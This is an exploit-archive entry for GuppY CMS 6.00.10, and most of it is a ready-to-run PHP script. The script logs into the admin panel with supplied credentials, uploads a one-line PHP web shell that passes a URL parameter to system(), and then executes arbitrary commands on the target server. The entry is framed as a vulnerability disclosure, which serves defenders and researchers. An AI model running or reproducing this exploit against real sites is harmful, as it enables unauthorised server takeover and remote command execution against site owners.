GuppY CMS 6.00.10 Shell Upload

2022.10.01
Credit: Chokri Hammedi
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: GuppY 6.00.10 CMS Remote Code Execution # Date: Sep 30, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.freeguppy.org/ # Software Link: https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2 # Version: 6.00.10 # Tested on: Linux #!/usr/bin/php <?php $username = "Admin"; //Administrator username $password = "rose1337"; //Administrator password $options = getopt('u:c:'); if(!isset($options['u'], $options['c'])) die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n \n"); $target = $options['u']; $command = $options['c']; // Administrator login $cookie="cookie.txt"; $url = "{$target}guppy/connect.php"; $postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password; $curlObj = curl_init(); curl_setopt($curlObj, CURLOPT_URL, $url); curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curlObj, CURLOPT_HEADER, 1); curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false); curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata); curl_setopt ($curlObj, CURLOPT_POST, 1); CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True); CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True); CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30); CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30); curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie"); curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie"); $result = curl_exec($curlObj); // uploading shell $url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload"; $post='------WebKitFormBoundarygA1APFcUlkIaWal4 Content-Disposition: form-data; name="rep" file ------WebKitFormBoundarygA1APFcUlkIaWal4 Content-Disposition: form-data; name="ficup"; filename="shell.php" Content-Type: application/x-php <?php system($_GET["cmd"]); ?> ------WebKitFormBoundarygA1APFcUlkIaWal4-- '; $headers = array( 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygA1APFcUlkIaWal4', 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36', 'Accept-Encoding: gzip, deflate', 'Accept-Language: en-US,en;q=0.9' ); curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers); curl_setopt($curlObj, CURLOPT_URL, $url2); curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post); curl_setopt($curlObj, CURLOPT_POST, true); curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false); CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True); CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True); CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30); CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30); curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie"); curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie"); $data = curl_exec($curlObj); // Executing the shell $shell = "{$target}guppy/file/shell.php?cmd=" .$command; curl_setopt($curlObj, CURLOPT_URL, $shell); curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded')); curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False); CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True); curl_setopt($curlObj, CURLOPT_HEADER, False); curl_setopt($curlObj, CURLOPT_POST, false); $exec_shell = curl_exec($curlObj); $code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE); if($code != 200) { echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the credentials\n"; } else { print("\n"); print($exec_shell); } curl_close($curlObj); ?>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top